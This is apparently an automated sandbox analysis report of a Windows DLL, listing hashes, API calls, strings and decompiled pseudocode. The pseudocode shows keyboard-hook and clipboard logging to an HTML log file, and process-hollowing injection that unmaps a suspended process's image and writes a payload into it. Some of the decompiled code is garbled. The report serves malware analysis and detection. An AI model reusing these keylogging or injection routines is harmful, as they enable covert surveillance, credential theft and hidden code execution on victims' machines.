Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseCriticalDeleteHandleSection
String ID:
API String ID: 1370521891-0
Opcode ID: 269cd16a933fb2f2a05e7184a288945c7f1de7f8f90c06772876b0a288ff3f32
Instruction ID: 60a53012df9d074323565359c769d0ac364e4643a7c8a37a3e2d445cc00f5d91
Opcode Fuzzy Hash: 269cd16a933fb2f2a05e7184a288945c7f1de7f8f90c06772876b0a288ff3f32
Instruction Fuzzy Hash: 1FA0129940400247F500E7E0DC818692108F7042C13D2051871044250ECD146004532A

Uniqueness

Uniqueness Score: -1.00%

Function 10003788, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 1000379B

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 04672e0b375c637b80715d6dceb747e02594dde89952f183c9eab0147d6330a5
Instruction ID: c2b807945fbd858067c7052735d838f70a134ef64bf736acf42af14dc62dc520
Opcode Fuzzy Hash: 04672e0b375c637b80715d6dceb747e02594dde89952f183c9eab0147d6330a5
Instruction Fuzzy Hash: 64C012F66506200BFB62CBA99CC0B8763CCDB892E5F1541A1A518DB208E660AC0086A2

Uniqueness

Uniqueness Score: -1.00%

Function 10004DF0, Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?,?,?,1000D54A,00000000,00000000,HgDdsuTd), ref: 10004E06

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
Instruction ID: 5a3873c4f99191ebd0c5874248a48e85116967648e1c4cce01420d804b7247f1
Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
Instruction Fuzzy Hash: 20C012B71A024CAB8B00EEA9CC06D9B33DCAB28609B008825B928CB100C539E5909B60

Uniqueness

Uniqueness Score: -1.00%

Function 10005678, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,100056A6,1000F834,1000F834,?,1000D2F8,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005679

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fe0dc61edb0e7cc40dd00668538b564961092fac01b342148f47dbe8c26fd250
Instruction ID: ea5e7307e224a2362f62b937032a713fdd445899dab5aa11519bd1f809b1bc4b
Opcode Fuzzy Hash: fe0dc61edb0e7cc40dd00668538b564961092fac01b342148f47dbe8c26fd250
Instruction Fuzzy Hash: 7AB012A88012410C7D40D175080506B31C4EB911F7BE71F81E874C34DDDF17940B2820

Uniqueness

Uniqueness Score: -1.00%

Function 10003748, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 1000374F

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 9d9605649b70b0fa5bc313e52292162510b87c7f1e5ee76dc899ddc6011781d1
Instruction ID: 594f7db3346f59ee2b746a14ae0536c80aa61ded5ebc518595aa97b66a28efc9
Opcode Fuzzy Hash: 9d9605649b70b0fa5bc313e52292162510b87c7f1e5ee76dc899ddc6011781d1
Instruction Fuzzy Hash: A9B012F820C70310FEAAD1210D517B703CCCB004C3F825014EF08C40CDDA50D8025031

Uniqueness

Uniqueness Score: -1.00%

Function 10002F24, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65215945d9a2a64676ffa77a597c81c9f24c7e28e3e4c58e5623c55a8f50257
Instruction ID: afd740ba37e0bc33af22663b88102fad2f1614a21055034617254271def5a9b3
Opcode Fuzzy Hash: d65215945d9a2a64676ffa77a597c81c9f24c7e28e3e4c58e5623c55a8f50257
Instruction Fuzzy Hash: 3EF08231308B076FB711DE4BAD90922F7FDFB996E035185BAE90893A18DB21F810C560

Uniqueness

Uniqueness Score: -1.00%

Function 10005664, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Malloc
String ID:
API String ID: 2696272793-0
Opcode ID: e494b0dbbd17313aec99b6fdc899f248a05a96dc61f52493615a425915e08986
Instruction ID: 2b23affcbc4175e08e38b0563d1324aa0b8922ef3a41ef4a7c7d2d78b35e8f64
Opcode Fuzzy Hash: e494b0dbbd17313aec99b6fdc899f248a05a96dc61f52493615a425915e08986
Instruction Fuzzy Hash: 06A0029574220407EB50D9FE98C174782CBA78D351FB04079710DC734BD955AC562136

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10008568, Relevance: 58.2, APIs: 22, Strings: 11, Instructions: 407
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E10008568(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				long _v24;
				long _v28;
				long _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v300;
				intOrPtr _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				intOrPtr _t100;
				intOrPtr _t101;
				void* _t109;
				void* _t111;
				void* _t121;
				intOrPtr _t133;
				long _t149;
				void* _t151;
				intOrPtr _t153;
				struct HHOOK__* _t158;
				struct HHOOK__* _t161;
				long _t191;
				void* _t194;
				void* _t196;
				long _t197;
				void* _t205;
				void* _t207;
				struct HHOOK__* _t209;
				intOrPtr _t228;
				void* _t244;
				void* _t247;
				intOrPtr _t256;
				void* _t265;
				void* _t266;
				void* _t267;
				void* _t268;
				intOrPtr _t271;
				intOrPtr _t282;
				intOrPtr _t289;
				intOrPtr _t301;
				intOrPtr _t302;
				intOrPtr _t303;
				void* _t328;
				intOrPtr _t330;
				intOrPtr _t331;
				void* _t333;

				_t327 = __esi;
				_t326 = __edi;
				_t330 = _t331;
				_t268 = 0x2f;
				do {
					_push(0);
					_push(0);
					_t268 = _t268 - 1;
				} while (_t268 != 0);
				_push(_t268);
				_push(__ebx);
				_push(__esi);
				_t265 = _a16;
				_t100 = _a8;
				_push(_t330);
				_push(0x10008ba5);
				_push( *[fs:edx]);
				 *[fs:edx] = _t331;
				_t333 = _t100 -  *0x1000f68c; // 0xc1b9
				if(_t333 != 0) {
					__eflags = _t100 -  *0x1000f690; // 0xc1ba
					if(__eflags != 0) {
						__eflags = _t100 -  *0x1000f694; // 0xc1bc
						if(__eflags != 0) {
							__eflags = _t100 -  *0x1000f698; // 0x0
							if(__eflags != 0) {
								__eflags = _t100 -  *0x1000f69c; // 0xc1bd
								if(__eflags != 0) {
									__eflags = _t100 - 0x308;
									if(_t100 != 0x308) {
										__eflags = _t100 -  *0x1000f6a0; // 0xc1be
										if(__eflags != 0) {
											_push(_t265);
											_push(_a12);
											_push(_t100);
											_t101 = _a4;
											_push(_t101);
											L10004FE0();
											_v8 = _t101;
										} else {
											__eflags =  *0x1000e0b8;
											if( *0x1000e0b8 != 0) {
												_t109 =  *0x1000e0b8; // 0x0
												SetFilePointer(_t109, 0, 0, 0);
												_t111 =  *0x1000e0b8; // 0x0
												SetEndOfFile(_t111);
												 *0x1000f6c4 = 0;
												 *0x1000f6c8 = 0;
												__eflags =  *0x1000f6c1 - 1;
												if(__eflags == 0) {
													E10006710( &_v380, _t268, 0,  *0x1000f6c4,  *0x1000f6c8);
													_t271 =  *0x1000f6b4; // 0x0
													E10003988( &_v384, _t271, L"SOFTWARE\\", __eflags);
													E1000577C(0x80000001, _t265, L"LastSize", _v384, __esi, __eflags, 2, _v380);
												}
											}
										}
									} else {
										__eflags =  *0x1000f6d4;
										if( *0x1000f6d4 != 0) {
											_t121 = E100069DC(0, _t265,  &_v12, __esi);
											__eflags = _t121 - 1;
											if(_t121 == 1) {
												_t289 =  *0x1000e0b4; // 0x0
												E10003A34(_v12, _t289);
												if(__eflags != 0) {
													E100037AC(0x1000e0b4, _v12);
													E10008270(L"\r\n\r\n", _t265,  &_v352, __edi, _t327);
													_push(_v352);
													_push(L"<FONT COLOR=\"red\">[Clipboard");
													_push(L" --- ");
													E10006B14(0x2f, _t265, 0x3a, 0x20, __edi, _t327,  &_v356);
													_push(_v356);
													_push(L"]</font>");
													E10008270(0x10008bcc, _t265,  &_v360, _t326, _t327);
													_push(_v360);
													_t133 =  *0x1000e0b4; // 0x0
													E10008270(_t133, _t265,  &_v364, _t326, _t327);
													_push(_v364);
													E10008270(0x10008bcc, _t265,  &_v368, _t326, _t327);
													_push(_v368);
													_push(L"<FONT COLOR=\"red\">[Clipboard End]</font>");
													E10008270(L"\r\n\r\n", _t265,  &_v372, _t326, _t327);
													_push(_v372);
													E100039EC();
													__eflags =  *0x1000e0b8 - 0xffffffff;
													if(__eflags != 0) {
														E100061F8(_v12,  &_v376, __eflags);
														E100037D0( &_v12, _v376);
														_t149 = E1000391C(_v12) + _t148;
														__eflags = _t149;
														_t151 =  *0x1000e0b8; // 0x0
														WriteFile(_t151, _v12, _t149,  &_v32, 0);
													}
													E100037AC(0x1000f6d0, L"qualquercoisarsrsr");
												}
											}
										}
									}
								} else {
									__eflags =  *0x1000f6d4;
									if( *0x1000f6d4 != 0) {
										_t153 =  *0x1000f69c; // 0xc1bd
										_v8 = _t153 + 1;
									}
								}
							} else {
								__eflags =  *0x1000f6d4;
								if( *0x1000f6d4 != 0) {
									_t158 =  *0x1000f6d4; // 0x0
									UnhookWindowsHookEx(_t158);
								}
								 *0x1000f6d4 = SetWindowsHookExW(0xd, E10008040, GetModuleHandleA(0), 0);
							}
						} else {
							__eflags =  *0x1000f6d4;
							if( *0x1000f6d4 != 0) {
								_t161 =  *0x1000f6d4; // 0x0
								UnhookWindowsHookEx(_t161);
							}
							 *0x1000f6d4 = 0;
						}
						goto L42;
					} else {
						E10003770( &_v12);
						__eflags =  *0x1000f6d4;
						if( *0x1000f6d4 != 0) {
							_t209 =  *0x1000f6d4; // 0x0
							UnhookWindowsHookEx(_t209);
						}
						__eflags =  *0x1000e0b8 - 0xffffffff;
						if(__eflags != 0) {
							_t194 =  *0x1000e0b8; // 0x0
							SetFilePointer(_t194, 0, 0, 0);
							_t196 =  *0x1000e0b8; // 0x0
							_t197 = GetFileSize(_t196, 0);
							__eflags = 0;
							_v28 = _t197;
							_v24 = 0;
							E10003BE4( &_v12, E10003FD4(_v28, _v24, 2, 0));
							_t205 =  *0x1000e0b8; // 0x0
							ReadFile(_t205, _v12, _v28,  &_v32, 0);
							_t207 =  *0x1000e0b8; // 0x0
							SetFilePointer(_t207, 0, 0, 2);
						}
						_t301 =  *0x1000f684; // 0x0
						E10003988( &_v336, L"temp", _t301, __eflags);
						SetFileAttributesW(E1000390C(_v336), 0x80);
						_t302 =  *0x1000f684; // 0x0
						E10003988( &_v340, L"temp", _t302, __eflags);
						DeleteFileW(E1000390C(_v340));
						_t303 =  *0x1000f684; // 0x0
						E10003988( &_v344, L"temp", _t303, __eflags);
						_t266 = CreateFileW(E1000390C(_v344), 0x40000000, 0, 0, 2, 0, 0);
						__eflags = _t266 - 0xffffffff;
						if(__eflags != 0) {
							E100061F8(_v12,  &_v348, __eflags);
							E100037D0( &_v12, _v348);
							_t191 = E1000391C(_v12) + _t190;
							__eflags = _t191;
							WriteFile(_t266, _v12, _t191,  &_v32, 0);
						}
						CloseHandle(_t266);
						 *0x1000f6d4 = SetWindowsHookExW(0xd, E10008040, GetModuleHandleA(0), 0);
						L42:
						_pop(_t282);
						 *[fs:eax] = _t282;
						_push(E10008BAC);
						E10003788( &_v384, 0x13);
						E10003788( &_v40, 2);
						return E10003788( &_v16, 2);
					}
				}
				_t328 = _t265;
				E100050D0( &_v308, _t328);
				VirtualFree(_t328, 0, 0x8000);
				E10006E78(_t265, __edi, _t328,  &_v36, _v308, _v304,  &_v300, _v44);
				E100037D0( &_v40, _v36);
				E10006974( &_v16);
				_t267 = E10008438(_v16, _t265, __edi, _t328);
				_t228 =  *0x1000f6d0; // 0x0
				E10003A34(_t228, _v16);
				if(_t333 == 0) {
					L6:
					E10003770( &_v16);
					L7:
					E10003A34(_v40, 0);
					if(0 != 0) {
						_t336 = _t267 - 1;
						if(_t267 == 1) {
							E10008270(_v36, _t267,  &_v328, _t326, _t328);
							E10003988( &_v12, _v328, _v16, _t336);
							_t337 =  *0x1000e0b8 - 0xffffffff;
							if( *0x1000e0b8 != 0xffffffff) {
								E100061F8(_v12,  &_v332, _t337);
								E100037D0( &_v12, _v332);
								_t244 = E1000391C(_v12);
								_t247 =  *0x1000e0b8; // 0x0
								WriteFile(_t247, _v12, _t244 + _t244,  &_v32, 0);
							}
						}
					}
					goto L42;
				}
				E10003A34(_v40, 0);
				if(0 == 0) {
					goto L6;
				} else {
					E100037AC(0x1000f6d0, _v16);
					_push(L"\r\n\r\n");
					_push(_v16);
					_push(0x10008bcc);
					_push(_v36);
					E100039EC();
					E10008270(L"\r\n\r\n", _t267,  &_v312, _t326, _t328);
					_push(_v312);
					_push(L"<FONT COLOR=\"blue\">[");
					_t256 =  *0x1000f6d0; // 0x0
					E10008270(_t256, _t267,  &_v316, _t326, _t328);
					_push(_v316);
					_push(0x10008c08);
					_push(L" --- ");
					E10006B14(0x2f, _t267, 0x3a, 0x20, _t326, _t328,  &_v320);
					_push(_v320);
					_push(L"</font>");
					E10008270(0x10008bcc, _t267,  &_v324, _t326, _t328);
					_push(_v324);
					E100039EC();
					goto L7;
				}
			}

0x10008568
0x10008568
0x10008569
0x1000856b
0x10008570
0x10008570
0x10008572
0x10008574
0x10008574
0x10008577
0x10008578
0x10008579
0x1000857a
0x1000857d
0x10008582
0x10008583
0x10008588
0x1000858b
0x1000858e
0x10008594
0x1000875b
0x10008761
0x100088e3
0x100088e9
0x1000890b
0x10008911
0x10008948
0x1000894e
0x1000896b
0x10008970
0x10008abc
0x10008ac2
0x10008b5b
0x10008b5f
0x10008b60
0x10008b61
0x10008b64
0x10008b65
0x10008b6a
0x10008ac8
0x10008ac8
0x10008acf
0x10008adb
0x10008ae1
0x10008ae6
0x10008aec
0x10008af1
0x10008afb
0x10008b05
0x10008b0c
0x10008b20
0x10008b34
0x10008b3f
0x10008b54
0x10008b54
0x10008b0c
0x10008acf
0x10008976
0x10008976
0x1000897d
0x10008988
0x1000898d
0x1000898f
0x10008998
0x1000899e
0x100089a3
0x100089b1
0x100089c1
0x100089c6
0x100089cc
0x100089d1
0x100089e9
0x100089ee
0x100089f4
0x10008a04
0x10008a09
0x10008a15
0x10008a1a
0x10008a1f
0x10008a30
0x10008a35
0x10008a3b
0x10008a4b
0x10008a50
0x10008a5e
0x10008a63
0x10008a6a
0x10008a75
0x10008a83
0x10008a96
0x10008a96
0x10008a9d
0x10008aa3
0x10008aa3
0x10008ab2
0x10008ab2
0x100089a3
0x1000898f
0x1000897d
0x10008950
0x10008950
0x10008957
0x1000895d
0x10008963
0x10008963
0x10008957
0x10008913
0x10008913
0x1000891a
0x1000891c
0x10008922
0x10008922
0x1000893e
0x1000893e
0x100088eb
0x100088eb
0x100088f2
0x100088f4
0x100088fa
0x100088fa
0x10008901
0x10008901
0x00000000
0x10008767
0x1000876a
0x1000876f
0x10008776
0x10008778
0x1000877e
0x1000877e
0x10008783
0x1000878a
0x10008792
0x10008798
0x1000879f
0x100087a5
0x100087aa
0x100087ac
0x100087af
0x100087c6
0x100087d9
0x100087df
0x100087ea
0x100087f0
0x100087f0
0x10008805
0x1000880b
0x1000881c
0x1000882c
0x10008832
0x10008843
0x10008862
0x10008868
0x1000887e
0x10008880
0x10008883
0x1000888e
0x1000889c
0x100088af
0x100088af
0x100088b7
0x100088b7
0x100088bd
0x100088d9
0x10008b6d
0x10008b6f
0x10008b72
0x10008b75
0x10008b85
0x10008b92
0x10008ba4
0x10008ba4
0x10008761
0x100085a5
0x100085aa
0x100085b7
0x100085db
0x100085e6
0x100085ee
0x100085fb
0x100085fd
0x10008605
0x1000860a
0x100086cd
0x100086d0
0x100086d5
0x100086da
0x100086df
0x100086e5
0x100086e8
0x100086f7
0x10008708
0x1000870d
0x10008714
0x10008723
0x10008731
0x1000873f
0x1000874b
0x10008751
0x10008751
0x10008714
0x100086e8
0x00000000
0x100086df
0x10008615
0x1000861a
0x00000000
0x10008620
0x10008628
0x1000862d
0x10008632
0x10008635
0x1000863a
0x10008645
0x10008655
0x1000865a
0x10008660
0x1000866b
0x10008670
0x10008675
0x1000867b
0x10008680
0x10008698
0x1000869d
0x100086a3
0x100086b3
0x100086b8
0x100086c6
0x00000000
0x100086c6

APIs

WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00008000,00000000,10008BA5), ref: 10008751
VirtualFree.KERNEL32(?,00000000,00008000,00000000,10008BA5,?,?,?,0000002E,00000000,00000000), ref: 100085B7

Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E

Strings

qualquercoisarsrsr, xrefs: 10008AAD
SOFTWARE\, xrefs: 10008B3A
temp, xrefs: 10008800, 10008827, 1000885D
, xrefs: 100086A3
[Clipboard End], xrefs: 10008A3B
[, xrefs: 10008660
], xrefs: 100089F4
--- , xrefs: 10008680, 100089D1
LastSize, xrefs: 10008B4A
[Clipboard, xrefs: 100089CC
, xrefs: 1000862D, 10008650, 100089BC, 10008A46

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Free$FileStringVirtualWrite
String ID: $ --- $$[$[Clipboard$[Clipboard End]$LastSize$SOFTWARE\$]$qualquercoisarsrsr$temp
API String ID: 84115566-3009520543
Opcode ID: 3e54d98d96c91ade860add0c425ff8f721c8a8c5c2a20d94251b01b29f7b05ae
Instruction ID: 057d20e264fa80afaee32c8a6c883f4daf1d9cc34b90863f49a2566050bc1c08
Opcode Fuzzy Hash: 3e54d98d96c91ade860add0c425ff8f721c8a8c5c2a20d94251b01b29f7b05ae
Instruction Fuzzy Hash: 6DF16F74A00219ABFB51DB64CC81FDE73B9FB083C0F508065F148A72ADDB75AE858B65

Uniqueness

Uniqueness Score: -1.00%

Function 1000BD14, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 244
injectionthreadsleepCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E1000BD14(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx) {
				intOrPtr* _t69;
				void* _t73;
				int _t86;
				signed int _t152;
				void* _t153;
				signed int _t155;
				void* _t170;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr _t184;
				void* _t186;
				void* _t187;
				signed int _t188;
				intOrPtr* _t189;
				void* _t190;
				intOrPtr _t191;
				intOrPtr* _t192;

				_t69 = __eax;
				asm("sbb [ebp+0xa111000], bh");
				_push(_t191);
				_t170 = __edx + 1;
				if(_t170 >= 0) {
					__eflags = 0;
					goto L11;
				} else {
					__ecx = __ecx + 1;
					__eflags = __ecx;
					if(__eflags < 0) {
						L11:
						_push(_t189);
						_push(0x1000bfdf);
						_push( *[fs:eax]);
						 *[fs:eax] = _t191;
						E100026E0(_t189 - 0x1c8, 0x44);
						_t73 = _t189 - 0x184;
						__eflags = 0;
						goto L12;
					} else {
						asm("popad");
						if(__eflags < 0) {
							 *__eax =  *__eax + __al;
							__eflags =  *__eax;
						}
						 *__eax =  *__eax + __al;
						 *__eax =  *__eax + __al;
						 *__eax =  *__eax + __al;
						asm("adc [eax], eax");
						 *__eax =  *__eax + __al;
						asm("sbb [eax], dl");
						 *__eax =  *__eax + __dl;
						asm("adc [ebp+0x6e], dl");
						__eflags =  *(__ecx + 0x6e + __ecx * 2) * 0x7463656a;
						if(__eflags < 0) {
							L12:
							_t192 = _t189;
							_pop(_t190);
							E100026E0(_t73, 0x10);
							E100026E0(_t190 - 0x294, 0xcc);
							 *(_t190 - 0x1c8) = 0x44;
							 *(_t190 - 0x294) = 0x10007;
							_t187 =  *(_t190 - 4);
							E1000BD50();
							E1000BD50();
							_t86 = CreateProcessW(0, E1000390C( *((intOrPtr*)(_t190 - 8))), 0, 0, 0, 4, 0, 0, _t190 - 0x1c8, _t190 - 0x184);
							__eflags = _t86;
							if(_t86 != 0) {
								Sleep(0xc8);
								GetThreadContext( *(_t190 - 0x180), _t190 - 0x294);
								ReadProcessMemory( *(_t190 - 0x184),  *((intOrPtr*)(_t190 - 0x1f0)) + 8, _t190 - 0x14, 4, _t190 - 0x10);
								NtUnmapViewOfSection( *(_t190 - 0x184), _t190 - 0x14);
								 *(_t190 - 0xc) = VirtualAllocEx( *(_t190 - 0x184),  *(_t190 - 0x118),  *(_t190 - 0xfc), 0x3000, 4);
								WriteProcessMemory( *(_t190 - 0x184),  *(_t190 - 0xc), _t187,  *(_t190 - 0xf8), _t190 - 0x10);
								_t186 =  *((intOrPtr*)(_t190 - 0x18)) + 0xf8;
								_t152 = ( *(_t190 - 0x146) & 0x0000ffff) - 1;
								__eflags = _t152;
								if(_t152 >= 0) {
									_t155 = _t152 + 1;
									_t188 = 0;
									__eflags = 0;
									do {
										_push(0);
										_push(_t186);
										asm("cdq");
										asm("adc edx, [esp+0x4]");
										_t192 = _t192 + 8;
										E1000BD50();
										WriteProcessMemory( *(_t190 - 0x184),  *(_t190 - 0xc) +  *((intOrPtr*)(_t190 - 0x168)),  *(_t190 - 4) +  *((intOrPtr*)(_t190 - 0x160)),  *(_t190 - 0x164), _t190 - 0x10);
										VirtualProtectEx( *(_t190 - 0x184),  *(_t190 - 0xc) +  *((intOrPtr*)(_t190 - 0x168)),  *(_t190 - 0x16c), 0x40, _t190 - 0x14);
										_t188 = _t188 + 1;
										_t155 = _t155 - 1;
										__eflags = _t155;
									} while (_t155 != 0);
								}
								__eflags = WriteProcessMemory( *(_t190 - 0x184),  *((intOrPtr*)(_t190 - 0x1f0)) + 8, _t190 - 0xc, 4, _t190 - 0x10) - 1;
								asm("sbb ebx, ebx");
								_t153 = _t152 + 1;
								 *((intOrPtr*)(_t190 - 0x1e4)) =  *(_t190 - 0xc) +  *((intOrPtr*)(_t190 - 0x124));
								__eflags = _t153 - 1;
								if(_t153 == 1) {
									__eflags = SetThreadContext( *(_t190 - 0x180), _t190 - 0x294) - 1;
									asm("sbb ebx, ebx");
									__eflags = _t153 + 1;
									ResumeThread( *(_t190 - 0x180));
								}
							}
							_pop(_t177);
							 *[fs:eax] = _t177;
							__eflags = 0;
							_pop(_t178);
							 *[fs:eax] = _t178;
							_push(E1000C02E);
							E10003770(_t190 - 8);
							_t179 =  *E1000BD14; // 0x1000bd18
							return E10004590(_t190 - 4, _t179);
						} else {
							if(__eflags < 0) {
								 *_t189 =  *_t189 + _t69;
								asm("outsb");
								 *_t69 =  *_t69 + _t69;
								 *_t69 =  *_t69 + _t69;
								 *((intOrPtr*)(_t189 - 0x75)) =  *((intOrPtr*)(_t189 - 0x75)) + _t170;
								asm("in al, dx");
								_push(_t189);
								_push(0x1000bd01);
								_push( *[fs:eax]);
								 *[fs:eax] = _t191;
								 *0x1000f82c =  *0x1000f82c + 1;
								_pop(_t184);
								 *[fs:eax] = _t184;
								_push(E1000BD08);
								return 0;
							}
							__eax =  &(__eax[0]);
							_t6 = __edx - 0x974918;
							 *_t6 =  *(__edx - 0x974918) + __dl;
							__eflags =  *_t6;
							_t8 = __eax;
							__eax = __edx;
							__edx = _t8;
							return __eax;
						}
					}
				}
				goto L21;
			}

0x1000bd14
0x1000bd14
0x1000bd1a
0x1000bd1b
0x1000bd1c
0x1000bd92
0x00000000
0x1000bd1e
0x1000bd1e
0x1000bd1e
0x1000bd20
0x1000bd94
0x1000bd94
0x1000bd95
0x1000bd9a
0x1000bd9d
0x1000bdad
0x1000bdb2
0x1000bdb8
0x00000000
0x1000bd22
0x1000bd22
0x1000bd23
0x1000bd25
0x1000bd25
0x1000bd25
0x1000bd26
0x1000bd28
0x1000bd2a
0x1000bd2c
0x1000bd2e
0x1000bd30
0x1000bd32
0x1000bd34
0x1000bd37
0x1000bd40
0x1000bdb9
0x1000bdb9
0x1000bdb9
0x1000bdbf
0x1000bdd1
0x1000bdd6
0x1000bde0
0x1000bdea
0x1000bdf7
0x1000be10
0x1000be3a
0x1000be3f
0x1000be41
0x1000be4c
0x1000be5f
0x1000be7f
0x1000be8f
0x1000beb5
0x1000becf
0x1000bed7
0x1000bee4
0x1000bee5
0x1000bee7
0x1000beed
0x1000beee
0x1000beee
0x1000bef0
0x1000bef4
0x1000bef5
0x1000befe
0x1000bf02
0x1000bf06
0x1000bf19
0x1000bf46
0x1000bf69
0x1000bf6e
0x1000bf6f
0x1000bf6f
0x1000bf6f
0x1000bef0
0x1000bf96
0x1000bf99
0x1000bf9b
0x1000bfa5
0x1000bfab
0x1000bfae
0x1000bfc3
0x1000bfc6
0x1000bfc8
0x1000bfd0
0x1000bfd0
0x1000bfae
0x1000bfd7
0x1000bfda
0x1000c003
0x1000c005
0x1000c008
0x1000c00b
0x1000c013
0x1000c01b
0x1000c026
0x1000bd43
0x1000bd43
0x1000bcd3
0x1000bcd6
0x1000bcd7
0x1000bcd9
0x1000bcdb
0x1000bcde
0x1000bce1
0x1000bce2
0x1000bce7
0x1000bcea
0x1000bced
